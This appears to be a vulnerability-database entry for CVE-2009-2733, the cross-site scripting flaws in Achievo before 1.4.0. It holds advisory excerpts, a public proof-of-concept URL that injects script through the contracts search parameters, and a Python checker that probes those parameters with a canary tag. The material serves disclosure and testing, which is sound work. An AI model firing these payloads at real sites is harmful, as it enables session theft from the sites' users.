CVE-2009-2733
Published: 2009-10-16
Priority: P4 · Severity: medium, CVSS 2.0 base score 4.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Exploit: public (Exploit-DB entries below)
EPSS: 2.26% (80.8th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in Achievo before 1.4.0 allow remote attackers to inject arbitrary web script or HTML via (1) the scheduler title in the scheduler module, and the (2) atksearch[contractnumber], (3) atksearch_AE_customer[customer], (4) atksearchmode[contracttype], and possibly (5) atksearch[contractname] parameters to the Organization Contracts administration page, reachable through dispatch.php.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| achievo | achievo | <= 1.3.4 | 1.4.0 |
No detection rules found.
Exploit-DB
Achievo 1.3.4 - Cross-Site Scripting (exploitdb · 2009-10-14 · CVSS 4.3 · CVE-2009-2733 [MEDIUM])
---
Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/
Multiple XSS in Achievo
1. *Advisory Information*
Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733
3. *Software Description*
Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, bu
Exploit-DB
Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities (exploitdb · 2009-10-13 · CVE-2009-2733)
---
source: https://www.securityfocus.com/bid/36661/info
Achievo is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
Versions prior to Achievo 1.4.0 are affected.
http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]=">alert('xss');&atksearchmode[contr
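The following Python script is an added example, not code from Achievo, Bonsai or the Exploit-DB entries above. It reproduces the check a tester would run against the Organization Contracts admin page: send a canary through each of the four search parameters named in the CVE text (the scheduler-title field is left out because the page does not give its parameter name), then parse the response and ask whether the canary was turned into markup. The canary `"><xsscanary7f3a>` follows the shape of the public PoC (close the surrounding attribute, then open a tag) but uses a made-up element name instead of `<script>`, so the check does not depend on running JavaScript. The `render_form` function and the host `achievo.example` are constructed stand-ins for the server, showing the raw echo the advisory describes beside an `htmlspecialchars`-style escaped version; against a live target you would fetch `build_probe_url(...)` and hand the body to `reflects_unescaped`.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlencode

# The four Organization Contracts search parameters named in the CVE text.
# The scheduler-title field is omitted: its parameter name is not on the page.
CONTRACT_PARAMS = [
    "atksearch[contractnumber]",
    "atksearch_AE_customer[customer]",
    "atksearchmode[contracttype]",
    "atksearch[contractname]",
]

# Fixed parameters copied from the public PoC URL for the contracts admin page.
BASE_PARAMS = {
    "atkprevlevel": "0",
    "atkescape": "",
    "atknodetype": "organization.contracts",
    "atkaction": "admin",
    "atksmartsearch": "clear",
    "atkstartat": "0",
}

# Canary: closes the enclosing attribute, then opens a made-up element.
CANARY_TAG = "xsscanary7f3a"
CANARY = f'"><{CANARY_TAG}>'


def build_probe_url(base_url, param, payload=CANARY):
    """Return the dispatch.php URL that reflects `payload` through `param`."""
    query = dict(BASE_PARAMS)
    query[param] = payload
    return f"{base_url}/dispatch.php?{urlencode(query)}"


class _TagSpotter(HTMLParser):
    """Records whether the canary element was parsed as a real start tag."""

    def __init__(self):
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == CANARY_TAG:
            self.found = True

    handle_startendtag = handle_starttag


def reflects_unescaped(body):
    """True when the canary became markup, i.e. the input broke out of its attribute."""
    spotter = _TagSpotter()
    spotter.feed(body)
    spotter.close()
    return spotter.found


def render_form(submitted, escape):
    """Constructed stand-in for the server: echo submitted search values back
    into `value` attributes, raw (the pre-1.4.0 behaviour the advisory
    describes) or HTML-escaped (what a fix must do)."""
    fields = []
    for name in CONTRACT_PARAMS:
        value = submitted.get(name, "")
        if escape:
            value = html.escape(value, quote=True)
        fields.append(f'<input type="text" name="{name}" value="{value}">')
    return "<form>" + "".join(fields) + "</form>"


def vulnerable_params(render):
    """Probe each parameter on its own and list those reflected unescaped.
    `render` maps a query dict to a response body (here render_form; against
    a live host it would be an HTTP GET of build_probe_url)."""
    hits = []
    for param in CONTRACT_PARAMS:
        if reflects_unescaped(render({param: CANARY})):
            hits.append(param)
    return hits


if __name__ == "__main__":
    # Hypothetical host, used only to show the URL shape.
    print(build_probe_url("http://achievo.example", CONTRACT_PARAMS[0]))
    print("raw echo:", vulnerable_params(lambda q: render_form(q, escape=False)))
    print("escaped :", vulnerable_params(lambda q: render_form(q, escape=True)))
```

Parsing the body rather than string-matching matters: the escaped form still carries every character of the canary (as `&quot;&gt;&lt;xsscanary7f3a&gt;`), so a scanner that HTML-decodes the response before matching would flag the fixed version too. Asking the parser whether a new element appeared tells you whether the value actually left its attribute context, which is the condition the PoC relies on.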
No writeups or analysis indexed.
References
http://secunia.com/advisories/37035
http://securitytracker.com/id?1023017
http://www.achievo.org/download/releasenotes/1_4_0
http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/
http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
http://www.securityfocus.com/archive/1/507133/100/0/threaded
http://www.securityfocus.com/bid/36661
https://exchange.xforce.ibmcloud.com/vulnerabilities/53744
https://exchange.xforce.ibmcloud.com/vulnerabilities/53745